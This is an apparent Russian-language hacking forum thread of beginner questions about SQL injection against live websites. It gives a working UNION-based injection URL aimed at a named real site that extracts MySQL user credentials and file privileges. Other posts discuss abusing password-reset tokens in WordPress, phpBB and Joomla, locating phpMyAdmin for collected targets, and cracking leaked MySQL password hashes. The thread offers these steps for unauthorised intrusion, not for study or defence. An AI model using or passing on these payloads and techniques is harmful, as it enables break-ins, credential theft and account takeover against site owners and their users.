Вопрос новичка по sql: Извлек нужные названия столбцов, а при попытке вывести из них информацию таким способом: http://actachemscand.dk/author.php?aid=-1126+union+select+1,2,Password,4+from+0x75736572+limit+0,1-- выдает ошибку.
Название БД в которую обращаешься, должно быть в чистом виде в вашем случае пример актуального запроса: _ttp://actachemscand.dk/author.php?aid=1126+and+1=0+union+select+1,2,concat_ws(0x3a,host,user,password,file_priv),4+from+mysql.user+--+
данный плагин не работает на последних версиях FF, устанавливайте старую версию ( до 30, если не ошибаюсь), если хоитите пользоваться данным плагином и не искать альтернативу
Нельзя, это факт. Но есть такая золотая штука как UNION. Можно закомментировать последующий запрос, и UNION'ом дать UPDATE. Такое возможно?
если я првильно понял то при ввборке из базы я никак не смогу внедрить апдейт или инсерт?Смогу поменять пароль только если есть кнопка забыли пароль и я смогу вытянуть токен которыц отсылаеться на эмейл для сброса пароля?
Если запрос начинается с SELECT то походу никак. А насчет токенов, из топовых CMS это актуально только в Wordpress. В phpbb если подставить токен на почту придет новый pass, а в базе как был хеш так и останется. В Jooml'е той что поновей, супер юзера вообще восстанавливать нельзя. Тема умирает потихоньку((
Если в конфигах сайта коннект идет к 127.0.0.1, следует ли из этого что какой нибудь порт под мускул открыт на его ип?
Ребята, есть некоторое количество Ума не приложу что с ними дальше делать. Искать phpmyadmin через reverse host lookup?
Ок,а как пароли расшифровывать. Например хеш *AC1F3171254396DBCE6598421920C634CD1040F1 встречается несколько раз, но cmd5 его отдает на перебор. все сайты разные, не может же быть что у них у всех одинаковый пароль если он реально сложный
Если он не соленый, почему тогда cmd5 не находит нечего. Мне кажется что cmd5 гораздо большую базу имеет чем 90% брутеров
